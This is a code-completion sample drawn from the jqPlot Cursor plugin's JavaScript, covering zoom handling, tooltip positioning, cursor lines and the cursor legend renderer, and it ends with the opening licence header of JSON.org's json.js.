// 'none', 'x' or 'y'
this.constrainZoomTo = 'none';
// // prop: autoscaleConstraint
// // when a constrained axis is specified, true will
// // autoscale the adjacent axis.
// this.autoscaleConstraint = true;
this.shapeRenderer = new $.jqplot.ShapeRenderer();
this._zoom = {start:[], end:[], started: false, zooming:false, isZoomed:false, axes:{start:{}, end:{}}, gridpos:{}, datapos:{}};
this._tooltipElem;
this.zoomCanvas;
this.cursorCanvas;
// prop: intersectionThreshold
// pixel distance from data point or marker to consider cursor lines intersecting with point.
// If data point markers are not shown, this should be >= 1 or will often miss point intersections.
this.intersectionThreshold = 2;
// prop: showCursorLegend
// Replace the plot legend with an enhanced legend displaying intersection information.
this.showCursorLegend = false;
// prop: cursorLegendFormatString
// Format string used in the cursor legend. If showTooltipDataPosition is true,
// this will also be the default format string used by tooltipFormatString.
this.cursorLegendFormatString = $.jqplot.Cursor.cursorLegendFormatString;
// document event handlers saved here so they can be restored after a zoom drag.
this._oldHandlers = {onselectstart: null, ondrag: null, onmousedown: null};
// prop: constrainOutsideZoom
// True to limit actual zoom area to edges of grid, even when zooming
// outside of plot area. That is, can't zoom out by mousing outside plot.
this.constrainOutsideZoom = true;
// prop: showTooltipOutsideZoom
// True will keep updating the tooltip when zooming of the grid.
this.showTooltipOutsideZoom = false;
// true if mouse is over grid, false if not.
this.onGrid = false;
$.extend(true, this, options);
};
$.jqplot.Cursor.cursorLegendFormatString = '%s x:%s, y:%s';
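// Typical configuration sketch (illustrative element id and option values only):
//
//   $.jqplot('chartdiv', data, {
//       cursor: {show: true, zoom: true, showTooltip: true, tooltipLocation: 'sw'}
//   });
//
// Any of the properties documented in the constructor above can be passed in
// the same way through the cursor options object.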
// called with scope of plot
$.jqplot.Cursor.init = function (target, data, opts){
// add a cursor attribute to the plot
var options = opts || {};
this.plugins.cursor = new $.jqplot.Cursor(options.cursor);
var c = this.plugins.cursor;
if (c.show) {
$.jqplot.eventListenerHooks.push(['jqplotMouseEnter', handleMouseEnter]);
$.jqplot.eventListenerHooks.push(['jqplotMouseLeave', handleMouseLeave]);
$.jqplot.eventListenerHooks.push(['jqplotMouseMove', handleMouseMove]);
if (c.showCursorLegend) {
opts.legend = opts.legend || {};
opts.legend.renderer = $.jqplot.CursorLegendRenderer;
opts.legend.formatString = this.plugins.cursor.cursorLegendFormatString;
opts.legend.show = true;
}
if (c.zoom) {
$.jqplot.eventListenerHooks.push(['jqplotMouseDown', handleMouseDown]);
if (c.clickReset) {
$.jqplot.eventListenerHooks.push(['jqplotClick', handleClick]);
}
if (c.dblClickReset) {
$.jqplot.eventListenerHooks.push(['jqplotDblClick', handleDblClick]);
}
}
this.resetZoom = function() {
var axes = this.axes;
if (!c.zoomProxy) {
for (var ax in axes) {
axes[ax].reset();
axes[ax]._ticks = [];
// fake out tick creation algorithm to make sure original auto
// computed format string is used if _overrideFormatString is true
if (c._zoom.axes[ax] !== undefined) {
axes[ax]._autoFormatString = c._zoom.axes[ax].tickFormatString;
}
}
this.redraw();
}
else {
var ctx = this.plugins.cursor.zoomCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx = null;
}
this.plugins.cursor._zoom.isZoomed = false;
this.target.trigger('jqplotResetZoom', [this, this.plugins.cursor]);
};
if (c.showTooltipDataPosition) {
c.showTooltipUnitPosition = false;
c.showTooltipGridPosition = false;
if (options.cursor.tooltipFormatString == undefined) {
c.tooltipFormatString = $.jqplot.Cursor.cursorLegendFormatString;
}
}
}
};
// called with context of plot
$.jqplot.Cursor.postDraw = function() {
var c = this.plugins.cursor;
// Memory Leaks patch
if (c.zoomCanvas) {
c.zoomCanvas.resetCanvas();
c.zoomCanvas = null;
}
if (c.cursorCanvas) {
c.cursorCanvas.resetCanvas();
c.cursorCanvas = null;
}
if (c._tooltipElem) {
c._tooltipElem.emptyForce();
c._tooltipElem = null;
}
if (c.zoom) {
c.zoomCanvas = new $.jqplot.GenericCanvas();
this.eventCanvas._elem.before(c.zoomCanvas.createElement(this._gridPadding, 'jqplot-zoom-canvas', this._plotDimensions, this));
c.zoomCanvas.setContext();
}
var elem = document.createElement('div');
c._tooltipElem = $(elem);
elem = null;
c._tooltipElem.addClass('jqplot-cursor-tooltip');
c._tooltipElem.css({position:'absolute', display:'none'});
if (c.zoomCanvas) {
c.zoomCanvas._elem.before(c._tooltipElem);
}
else {
this.eventCanvas._elem.before(c._tooltipElem);
}
if (c.showVerticalLine || c.showHorizontalLine) {
c.cursorCanvas = new $.jqplot.GenericCanvas();
this.eventCanvas._elem.before(c.cursorCanvas.createElement(this._gridPadding, 'jqplot-cursor-canvas', this._plotDimensions, this));
c.cursorCanvas.setContext();
}
// if we are showing the positions in unit coordinates, and no axes groups
// were specified, create a default set.
if (c.showTooltipUnitPosition){
if (c.tooltipAxisGroups.length === 0) {
var series = this.series;
var s;
var temp = [];
for (var i=0; i<series.length; i++) {
s = series[i];
var ax = s.xaxis+','+s.yaxis;
if ($.inArray(ax, temp) == -1) {
temp.push(ax);
}
}
for (var i=0; i<temp.length; i++) {
c.tooltipAxisGroups.push(temp[i].split(','));
}
}
}
};
// Group: methods
//
// method: $.jqplot.Cursor.zoomProxy
// links targetPlot to controllerPlot so that plot zooming of
// targetPlot will be controlled by zooming on the controllerPlot.
// controllerPlot will not actually zoom, but acts as an
// overview plot. Note, the zoom options must be set to true for
// zoomProxy to work.
$.jqplot.Cursor.zoomProxy = function(targetPlot, controllerPlot) {
var tc = targetPlot.plugins.cursor;
var cc = controllerPlot.plugins.cursor;
tc.zoomTarget = true;
tc.zoom = true;
tc.style = 'auto';
tc.dblClickReset = false;
cc.zoom = true;
cc.zoomProxy = true;
controllerPlot.target.bind('jqplotZoom', plotZoom);
controllerPlot.target.bind('jqplotResetZoom', plotReset);
function plotZoom(ev, gridpos, datapos, plot, cursor) {
tc.doZoom(gridpos, datapos, targetPlot, cursor);
}
function plotReset(ev, plot, cursor) {
targetPlot.resetZoom();
}
};
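// Usage sketch for zoomProxy (hypothetical element ids, for illustration):
//
//   var detail = $.jqplot('detail', data, {cursor: {show: true, zoom: true}});
//   var overview = $.jqplot('overview', data, {cursor: {show: true, zoom: true}});
//   $.jqplot.Cursor.zoomProxy(detail, overview);
//
// Dragging a zoom box on the overview plot now zooms the detail plot, while
// the overview itself stays unzoomed and acts as the controller.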
$.jqplot.Cursor.prototype.resetZoom = function(plot, cursor) {
var axes = plot.axes;
var cax = cursor._zoom.axes;
if (!plot.plugins.cursor.zoomProxy && cursor._zoom.isZoomed) {
for (var ax in axes) {
// axes[ax]._ticks = [];
// axes[ax].min = cax[ax].min;
// axes[ax].max = cax[ax].max;
// axes[ax].numberTicks = cax[ax].numberTicks;
// axes[ax].tickInterval = cax[ax].tickInterval;
// // for date axes
// axes[ax].daTickInterval = cax[ax].daTickInterval;
axes[ax].reset();
axes[ax]._ticks = [];
// fake out tick creation algorithm to make sure original auto
// computed format string is used if _overrideFormatString is true
axes[ax]._autoFormatString = cax[ax].tickFormatString;
}
plot.redraw();
cursor._zoom.isZoomed = false;
}
else {
var ctx = cursor.zoomCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx = null;
}
plot.target.trigger('jqplotResetZoom', [plot, cursor]);
};
$.jqplot.Cursor.resetZoom = function(plot) {
plot.resetZoom();
};
$.jqplot.Cursor.prototype.doZoom = function (gridpos, datapos, plot, cursor) {
var c = cursor;
var axes = plot.axes;
var zaxes = c._zoom.axes;
var start = zaxes.start;
var end = zaxes.end;
var min, max, dp, span,
newmin, newmax, curax, _numberTicks, ret;
var ctx = plot.plugins.cursor.zoomCanvas._ctx;
// don't zoom if zoom area is too small (in pixels)
if ((c.constrainZoomTo == 'none' && Math.abs(gridpos.x - c._zoom.start[0]) > 6 && Math.abs(gridpos.y - c._zoom.start[1]) > 6) || (c.constrainZoomTo == 'x' && Math.abs(gridpos.x - c._zoom.start[0]) > 6) || (c.constrainZoomTo == 'y' && Math.abs(gridpos.y - c._zoom.start[1]) > 6)) {
if (!plot.plugins.cursor.zoomProxy) {
for (var ax in datapos) {
// make a copy of the original axes to revert back.
if (c._zoom.axes[ax] == undefined) {
c._zoom.axes[ax] = {};
c._zoom.axes[ax].numberTicks = axes[ax].numberTicks;
c._zoom.axes[ax].tickInterval = axes[ax].tickInterval;
// for date axes...
c._zoom.axes[ax].daTickInterval = axes[ax].daTickInterval;
c._zoom.axes[ax].min = axes[ax].min;
c._zoom.axes[ax].max = axes[ax].max;
c._zoom.axes[ax].tickFormatString = (axes[ax].tickOptions != null) ? axes[ax].tickOptions.formatString : '';
}
if ((c.constrainZoomTo == 'none') || (c.constrainZoomTo == 'x' && ax.charAt(0) == 'x') || (c.constrainZoomTo == 'y' && ax.charAt(0) == 'y')) {
dp = datapos[ax];
if (dp != null) {
if (dp > start[ax]) {
newmin = start[ax];
newmax = dp;
}
else {
span = start[ax] - dp;
newmin = dp;
newmax = start[ax];
}
curax = axes[ax];
_numberTicks = null;
// if aligning this axis, use number of ticks from previous axis.
// Do I need to reset somehow if alignTicks is changed and then graph is replotted??
if (curax.alignTicks) {
if (curax.name === 'x2axis' && plot.axes.xaxis.show) {
_numberTicks = plot.axes.xaxis.numberTicks;
}
else if (curax.name.charAt(0) === 'y' && curax.name !== 'yaxis' && curax.name !== 'yMidAxis' && plot.axes.yaxis.show) {
_numberTicks = plot.axes.yaxis.numberTicks;
}
}
if (this.looseZoom && (axes[ax].renderer.constructor === $.jqplot.LinearAxisRenderer || axes[ax].renderer.constructor === $.jqplot.LogAxisRenderer )) { //} || axes[ax].renderer.constructor === $.jqplot.DateAxisRenderer)) {
ret = $.jqplot.LinearTickGenerator(newmin, newmax, curax._scalefact, _numberTicks);
// if new minimum is less than "true" minimum of axis display, adjust it
if (axes[ax].tickInset && ret[0] < axes[ax].min + axes[ax].tickInset * axes[ax].tickInterval) {
ret[0] += ret[4];
ret[2] -= 1;
}
// if new maximum is greater than "true" max of axis display, adjust it
if (axes[ax].tickInset && ret[1] > axes[ax].max - axes[ax].tickInset * axes[ax].tickInterval) {
ret[1] -= ret[4];
ret[2] -= 1;
}
// for log axes, don't fall below current minimum, this will look bad and can't have 0 in range anyway.
if (axes[ax].renderer.constructor === $.jqplot.LogAxisRenderer && ret[0] < axes[ax].min) {
// remove a tick and shift min up
ret[0] += ret[4];
ret[2] -= 1;
}
axes[ax].min = ret[0];
axes[ax].max = ret[1];
axes[ax]._autoFormatString = ret[3];
axes[ax].numberTicks = ret[2];
axes[ax].tickInterval = ret[4];
// for date axes...
axes[ax].daTickInterval = [ret[4]/1000, 'seconds'];
}
else {
axes[ax].min = newmin;
axes[ax].max = newmax;
axes[ax].tickInterval = null;
axes[ax].numberTicks = null;
// for date axes...
axes[ax].daTickInterval = null;
}
axes[ax]._ticks = [];
}
}
// if ((c.constrainZoomTo == 'x' && ax.charAt(0) == 'y' && c.autoscaleConstraint) || (c.constrainZoomTo == 'y' && ax.charAt(0) == 'x' && c.autoscaleConstraint)) {
// dp = datapos[ax];
// if (dp != null) {
// axes[ax].max == null;
// axes[ax].min = null;
// }
// }
}
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
plot.redraw();
c._zoom.isZoomed = true;
ctx = null;
}
plot.target.trigger('jqplotZoom', [gridpos, datapos, plot, cursor]);
}
};
$.jqplot.preInitHooks.push($.jqplot.Cursor.init);
$.jqplot.postDrawHooks.push($.jqplot.Cursor.postDraw);
function updateTooltip(gridpos, datapos, plot) {
var c = plot.plugins.cursor;
var s = '';
var addbr = false;
if (c.showTooltipGridPosition) {
s = gridpos.x+', '+gridpos.y;
addbr = true;
}
if (c.showTooltipUnitPosition) {
var g;
for (var i=0; i<c.tooltipAxisGroups.length; i++) {
g = c.tooltipAxisGroups[i];
if (addbr) {
s += '<br />';
}
if (c.useAxesFormatters) {
for (var j=0; j<g.length; j++) {
if (j) {
s += ', ';
}
var af = plot.axes[g[j]]._ticks[0].formatter;
var afstr = plot.axes[g[j]]._ticks[0].formatString;
s += af(afstr, datapos[g[j]]);
}
}
else {
s += $.jqplot.sprintf(c.tooltipFormatString, datapos[g[0]], datapos[g[1]]);
}
addbr = true;
}
}
if (c.showTooltipDataPosition) {
var series = plot.series;
var ret = getIntersectingPoints(plot, gridpos.x, gridpos.y);
var addbr = false;
for (var i = 0; i< series.length; i++) {
if (series[i].show) {
var idx = series[i].index;
var label = series[i].label.toString();
var cellid = $.inArray(idx, ret.indices);
var sx = undefined;
var sy = undefined;
if (cellid != -1) {
var data = ret.data[cellid].data;
if (c.useAxesFormatters) {
var xf = series[i]._xaxis._ticks[0].formatter;
var yf = series[i]._yaxis._ticks[0].formatter;
var xfstr = series[i]._xaxis._ticks[0].formatString;
var yfstr = series[i]._yaxis._ticks[0].formatString;
sx = xf(xfstr, data[0]);
sy = yf(yfstr, data[1]);
}
else {
sx = data[0];
sy = data[1];
}
if (addbr) {
s += '<br />';
}
s += $.jqplot.sprintf(c.tooltipFormatString, label, sx, sy);
addbr = true;
}
}
}
}
c._tooltipElem.html(s);
}
function moveLine(gridpos, plot) {
var c = plot.plugins.cursor;
var ctx = c.cursorCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
if (c.showVerticalLine) {
c.shapeRenderer.draw(ctx, [[gridpos.x, 0], [gridpos.x, ctx.canvas.height]]);
}
if (c.showHorizontalLine) {
c.shapeRenderer.draw(ctx, [[0, gridpos.y], [ctx.canvas.width, gridpos.y]]);
}
var ret = getIntersectingPoints(plot, gridpos.x, gridpos.y);
if (c.showCursorLegend) {
var cells = $(plot.targetId + ' td.jqplot-cursor-legend-label');
for (var i=0; i<cells.length; i++) {
var idx = $(cells[i]).data('seriesIndex');
var series = plot.series[idx];
var label = series.label.toString();
var cellid = $.inArray(idx, ret.indices);
var sx = undefined;
var sy = undefined;
if (cellid != -1) {
var data = ret.data[cellid].data;
if (c.useAxesFormatters) {
var xf = series._xaxis._ticks[0].formatter;
var yf = series._yaxis._ticks[0].formatter;
var xfstr = series._xaxis._ticks[0].formatString;
var yfstr = series._yaxis._ticks[0].formatString;
sx = xf(xfstr, data[0]);
sy = yf(yfstr, data[1]);
}
else {
sx = data[0];
sy = data[1];
}
}
if (plot.legend.escapeHtml) {
$(cells[i]).text($.jqplot.sprintf(c.cursorLegendFormatString, label, sx, sy));
}
else {
$(cells[i]).html($.jqplot.sprintf(c.cursorLegendFormatString, label, sx, sy));
}
}
}
ctx = null;
}
function getIntersectingPoints(plot, x, y) {
var ret = {indices:[], data:[]};
var s, i, d0, d, j, r, p;
var threshold;
var c = plot.plugins.cursor;
for (var i=0; i<plot.series.length; i++) {
s = plot.series[i];
r = s.renderer;
if (s.show) {
threshold = c.intersectionThreshold;
if (s.showMarker) {
threshold += s.markerRenderer.size/2;
}
for (var j=0; j<s.gridData.length; j++) {
p = s.gridData[j];
// check vertical line
if (c.showVerticalLine) {
if (Math.abs(x-p[0]) <= threshold) {
ret.indices.push(i);
ret.data.push({seriesIndex: i, pointIndex:j, gridData:p, data:s.data[j]});
}
}
}
}
}
return ret;
}
function moveTooltip(gridpos, plot) {
var c = plot.plugins.cursor;
var elem = c._tooltipElem;
switch (c.tooltipLocation) {
case 'nw':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true) - c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top - c.tooltipOffset - elem.outerHeight(true);
break;
case 'n':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true)/2;
var y = gridpos.y + plot._gridPadding.top - c.tooltipOffset - elem.outerHeight(true);
break;
case 'ne':
var x = gridpos.x + plot._gridPadding.left + c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top - c.tooltipOffset - elem.outerHeight(true);
break;
case 'e':
var x = gridpos.x + plot._gridPadding.left + c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top - elem.outerHeight(true)/2;
break;
case 'se':
var x = gridpos.x + plot._gridPadding.left + c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top + c.tooltipOffset;
break;
case 's':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true)/2;
var y = gridpos.y + plot._gridPadding.top + c.tooltipOffset;
break;
case 'sw':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true) - c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top + c.tooltipOffset;
break;
case 'w':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true) - c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top - elem.outerHeight(true)/2;
break;
default:
var x = gridpos.x + plot._gridPadding.left + c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top + c.tooltipOffset;
break;
}
elem.css('left', x);
elem.css('top', y);
elem = null;
}
function positionTooltip(plot) {
// fake a grid for positioning
var grid = plot._gridPadding;
var c = plot.plugins.cursor;
var elem = c._tooltipElem;
switch (c.tooltipLocation) {
case 'nw':
var a = grid.left + c.tooltipOffset;
var b = grid.top + c.tooltipOffset;
elem.css('left', a);
elem.css('top', b);
break;
case 'n':
var a = (grid.left + (plot._plotDimensions.width - grid.right))/2 - elem.outerWidth(true)/2;
var b = grid.top + c.tooltipOffset;
elem.css('left', a);
elem.css('top', b);
break;
case 'ne':
var a = grid.right + c.tooltipOffset;
var b = grid.top + c.tooltipOffset;
elem.css({right:a, top:b});
break;
case 'e':
var a = grid.right + c.tooltipOffset;
var b = (grid.top + (plot._plotDimensions.height - grid.bottom))/2 - elem.outerHeight(true)/2;
elem.css({right:a, top:b});
break;
case 'se':
var a = grid.right + c.tooltipOffset;
var b = grid.bottom + c.tooltipOffset;
elem.css({right:a, bottom:b});
break;
case 's':
var a = (grid.left + (plot._plotDimensions.width - grid.right))/2 - elem.outerWidth(true)/2;
var b = grid.bottom + c.tooltipOffset;
elem.css({left:a, bottom:b});
break;
case 'sw':
var a = grid.left + c.tooltipOffset;
var b = grid.bottom + c.tooltipOffset;
elem.css({left:a, bottom:b});
break;
case 'w':
var a = grid.left + c.tooltipOffset;
var b = (grid.top + (plot._plotDimensions.height - grid.bottom))/2 - elem.outerHeight(true)/2;
elem.css({left:a, top:b});
break;
default: // same as 'se'
var a = grid.right + c.tooltipOffset;
var b = grid.bottom + c.tooltipOffset;
elem.css({right:a, bottom:b});
break;
}
elem = null;
}
function handleClick (ev, gridpos, datapos, neighbor, plot) {
ev.preventDefault();
ev.stopImmediatePropagation();
var c = plot.plugins.cursor;
if (c.clickReset) {
c.resetZoom(plot, c);
}
var sel = window.getSelection;
if (document.selection && document.selection.empty)
{
document.selection.empty();
}
else if (sel && !sel().isCollapsed) {
sel().collapse();
}
return false;
}
function handleDblClick (ev, gridpos, datapos, neighbor, plot) {
ev.preventDefault();
ev.stopImmediatePropagation();
var c = plot.plugins.cursor;
if (c.dblClickReset) {
c.resetZoom(plot, c);
}
var sel = window.getSelection;
if (document.selection && document.selection.empty)
{
document.selection.empty();
}
else if (sel && !sel().isCollapsed) {
sel().collapse();
}
return false;
}
function handleMouseLeave(ev, gridpos, datapos, neighbor, plot) {
var c = plot.plugins.cursor;
c.onGrid = false;
if (c.show) {
$(ev.target).css('cursor', c.previousCursor);
if (c.showTooltip && !(c._zoom.zooming && c.showTooltipOutsideZoom && !c.constrainOutsideZoom)) {
c._tooltipElem.empty();
c._tooltipElem.hide();
}
if (c.zoom) {
c._zoom.gridpos = gridpos;
c._zoom.datapos = datapos;
}
if (c.showVerticalLine || c.showHorizontalLine) {
var ctx = c.cursorCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx = null;
}
if (c.showCursorLegend) {
var cells = $(plot.targetId + ' td.jqplot-cursor-legend-label');
for (var i=0; i<cells.length; i++) {
var idx = $(cells[i]).data('seriesIndex');
var series = plot.series[idx];
var label = series.label.toString();
if (plot.legend.escapeHtml) {
$(cells[i]).text($.jqplot.sprintf(c.cursorLegendFormatString, label, undefined, undefined));
}
else {
$(cells[i]).html($.jqplot.sprintf(c.cursorLegendFormatString, label, undefined, undefined));
}
}
}
}
}
function handleMouseEnter(ev, gridpos, datapos, neighbor, plot) {
var c = plot.plugins.cursor;
c.onGrid = true;
if (c.show) {
c.previousCursor = ev.target.style.cursor;
ev.target.style.cursor = c.style;
if (c.showTooltip) {
updateTooltip(gridpos, datapos, plot);
if (c.followMouse) {
moveTooltip(gridpos, plot);
}
else {
positionTooltip(plot);
}
c._tooltipElem.show();
}
if (c.showVerticalLine || c.showHorizontalLine) {
moveLine(gridpos, plot);
}
}
}
function handleMouseMove(ev, gridpos, datapos, neighbor, plot) {
var c = plot.plugins.cursor;
if (c.show) {
if (c.showTooltip) {
updateTooltip(gridpos, datapos, plot);
if (c.followMouse) {
moveTooltip(gridpos, plot);
}
}
if (c.showVerticalLine || c.showHorizontalLine) {
moveLine(gridpos, plot);
}
}
}
function getEventPosition(ev) {
var plot = ev.data.plot;
var go = plot.eventCanvas._elem.offset();
var gridPos = {x:ev.pageX - go.left, y:ev.pageY - go.top};
//////
// TO DO: handle yMidAxis
//////
var dataPos = {xaxis:null, yaxis:null, x2axis:null, y2axis:null, y3axis:null, y4axis:null, y5axis:null, y6axis:null, y7axis:null, y8axis:null, y9axis:null, yMidAxis:null};
var an = ['xaxis', 'yaxis', 'x2axis', 'y2axis', 'y3axis', 'y4axis', 'y5axis', 'y6axis', 'y7axis', 'y8axis', 'y9axis', 'yMidAxis'];
var ax = plot.axes;
var n, axis;
for (n=11; n>0; n--) {
axis = an[n-1];
if (ax[axis].show) {
dataPos[axis] = ax[axis].series_p2u(gridPos[axis.charAt(0)]);
}
}
return {offsets:go, gridPos:gridPos, dataPos:dataPos};
}
function handleZoomMove(ev) {
var plot = ev.data.plot;
var c = plot.plugins.cursor;
// don't do anything if not on grid.
if (c.show && c.zoom && c._zoom.started && !c.zoomTarget) {
ev.preventDefault();
var ctx = c.zoomCanvas._ctx;
var positions = getEventPosition(ev);
var gridpos = positions.gridPos;
var datapos = positions.dataPos;
c._zoom.gridpos = gridpos;
c._zoom.datapos = datapos;
c._zoom.zooming = true;
var xpos = gridpos.x;
var ypos = gridpos.y;
var height = ctx.canvas.height;
var width = ctx.canvas.width;
if (c.showTooltip && !c.onGrid && c.showTooltipOutsideZoom) {
updateTooltip(gridpos, datapos, plot);
if (c.followMouse) {
moveTooltip(gridpos, plot);
}
}
if (c.constrainZoomTo == 'x') {
c._zoom.end = [xpos, height];
}
else if (c.constrainZoomTo == 'y') {
c._zoom.end = [width, ypos];
}
else {
c._zoom.end = [xpos, ypos];
}
var sel = window.getSelection;
if (document.selection && document.selection.empty)
{
document.selection.empty();
}
else if (sel && !sel().isCollapsed) {
sel().collapse();
}
drawZoomBox.call(c);
ctx = null;
}
<|fim▁hole|>
function handleMouseDown(ev, gridpos, datapos, neighbor, plot) {
var c = plot.plugins.cursor;
if(plot.plugins.mobile){
$(document).one('vmouseup.jqplot_cursor', {plot:plot}, handleMouseUp);
} else {
$(document).one('mouseup.jqplot_cursor', {plot:plot}, handleMouseUp);
}
var axes = plot.axes;
if (document.onselectstart != undefined) {
c._oldHandlers.onselectstart = document.onselectstart;
document.onselectstart = function () { return false; };
}
if (document.ondrag != undefined) {
c._oldHandlers.ondrag = document.ondrag;
document.ondrag = function () { return false; };
}
if (document.onmousedown != undefined) {
c._oldHandlers.onmousedown = document.onmousedown;
document.onmousedown = function () { return false; };
}
if (c.zoom) {
if (!c.zoomProxy) {
var ctx = c.zoomCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx = null;
}
if (c.constrainZoomTo == 'x') {
c._zoom.start = [gridpos.x, 0];
}
else if (c.constrainZoomTo == 'y') {
c._zoom.start = [0, gridpos.y];
}
else {
c._zoom.start = [gridpos.x, gridpos.y];
}
c._zoom.started = true;
for (var ax in datapos) {
// get zoom starting position.
c._zoom.axes.start[ax] = datapos[ax];
}
if(plot.plugins.mobile){
$(document).bind('vmousemove.jqplotCursor', {plot:plot}, handleZoomMove);
} else {
$(document).bind('mousemove.jqplotCursor', {plot:plot}, handleZoomMove);
}
}
}
function handleMouseUp(ev) {
var plot = ev.data.plot;
var c = plot.plugins.cursor;
if (c.zoom && c._zoom.zooming && !c.zoomTarget) {
var xpos = c._zoom.gridpos.x;
var ypos = c._zoom.gridpos.y;
var datapos = c._zoom.datapos;
var height = c.zoomCanvas._ctx.canvas.height;
var width = c.zoomCanvas._ctx.canvas.width;
var axes = plot.axes;
if (c.constrainOutsideZoom && !c.onGrid) {
if (xpos < 0) { xpos = 0; }
else if (xpos > width) { xpos = width; }
if (ypos < 0) { ypos = 0; }
else if (ypos > height) { ypos = height; }
for (var axis in datapos) {
if (datapos[axis]) {
if (axis.charAt(0) == 'x') {
datapos[axis] = axes[axis].series_p2u(xpos);
}
else {
datapos[axis] = axes[axis].series_p2u(ypos);
}
}
}
}
if (c.constrainZoomTo == 'x') {
ypos = height;
}
else if (c.constrainZoomTo == 'y') {
xpos = width;
}
c._zoom.end = [xpos, ypos];
c._zoom.gridpos = {x:xpos, y:ypos};
c.doZoom(c._zoom.gridpos, datapos, plot, c);
}
c._zoom.started = false;
c._zoom.zooming = false;
$(document).unbind('mousemove.jqplotCursor', handleZoomMove);
if (document.onselectstart != undefined && c._oldHandlers.onselectstart != null){
document.onselectstart = c._oldHandlers.onselectstart;
c._oldHandlers.onselectstart = null;
}
if (document.ondrag != undefined && c._oldHandlers.ondrag != null){
document.ondrag = c._oldHandlers.ondrag;
c._oldHandlers.ondrag = null;
}
if (document.onmousedown != undefined && c._oldHandlers.onmousedown != null){
document.onmousedown = c._oldHandlers.onmousedown;
c._oldHandlers.onmousedown = null;
}
}
function drawZoomBox() {
var start = this._zoom.start;
var end = this._zoom.end;
var ctx = this.zoomCanvas._ctx;
var l, t, h, w;
if (end[0] > start[0]) {
l = start[0];
w = end[0] - start[0];
}
else {
l = end[0];
w = start[0] - end[0];
}
if (end[1] > start[1]) {
t = start[1];
h = end[1] - start[1];
}
else {
t = end[1];
h = start[1] - end[1];
}
ctx.fillStyle = 'rgba(0,0,0,0.2)';
ctx.strokeStyle = '#999999';
ctx.lineWidth = 1.0;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx.fillRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx.clearRect(l, t, w, h);
// IE won't show transparent fill rect, so stroke a rect also.
ctx.strokeRect(l,t,w,h);
ctx = null;
}
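// Worked example of the normalization above (illustrative numbers): a drag
// from start [200, 150] to end [120, 90] yields l=120, t=90, w=80, h=60, so
// the cleared (highlighted) rectangle is the same whichever corner the drag
// started from.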
$.jqplot.CursorLegendRenderer = function(options) {
$.jqplot.TableLegendRenderer.call(this, options);
this.formatString = '%s';
};
$.jqplot.CursorLegendRenderer.prototype = new $.jqplot.TableLegendRenderer();
$.jqplot.CursorLegendRenderer.prototype.constructor = $.jqplot.CursorLegendRenderer;
// called in context of a Legend
$.jqplot.CursorLegendRenderer.prototype.draw = function() {
if (this._elem) {
this._elem.emptyForce();
this._elem = null;
}
if (this.show) {
var series = this._series, s;
// make a table. one line label per row.
var elem = document.createElement('div');
this._elem = $(elem);
elem = null;
this._elem.addClass('jqplot-legend jqplot-cursor-legend');
this._elem.css('position', 'absolute');
var pad = false;
for (var i = 0; i< series.length; i++) {
s = series[i];
if (s.show && s.showLabel) {
var lt = $.jqplot.sprintf(this.formatString, s.label.toString());
if (lt) {
var color = s.color;
if (s._stack && !s.fill) {
color = '';
}
addrow.call(this, lt, color, pad, i);
pad = true;
}
// let plugins add more rows to legend. Used by trend line plugin.
for (var j=0; j<$.jqplot.addLegendRowHooks.length; j++) {
var item = $.jqplot.addLegendRowHooks[j].call(this, s);
if (item) {
addrow.call(this, item.label, item.color, pad);
pad = true;
}
}
}
}
series = s = null;
delete series;
delete s;
}
function addrow(label, color, pad, idx) {
var rs = (pad) ? this.rowSpacing : '0';
var tr = $('<tr class="jqplot-legend jqplot-cursor-legend"></tr>').appendTo(this._elem);
tr.data('seriesIndex', idx);
$('<td class="jqplot-legend jqplot-cursor-legend-swatch" style="padding-top:'+rs+';">'+
'<div style="border:1px solid #cccccc;padding:0.2em;">'+
'<div class="jqplot-cursor-legend-swatch" style="background-color:'+color+';"></div>'+
'</div></td>').appendTo(tr);
var td = $('<td class="jqplot-legend jqplot-cursor-legend-label" style="vertical-align:middle;padding-top:'+rs+';"></td>');
td.appendTo(tr);
td.data('seriesIndex', idx);
if (this.escapeHtml) {
td.text(label);
}
else {
td.html(label);
}
tr = null;
td = null;
}
return this._elem;
};
})(jQuery);<|fim▁end|> | }
|
<|file_name|>json.js<|end_file_name|><|fim▁begin|>/*
Copyright (c) 2002 JSON.org
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
The Software shall be used for Good, not Evil.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
json.js
2006-10-05
This file adds these methods to JavaScript:
object.toJSONString()
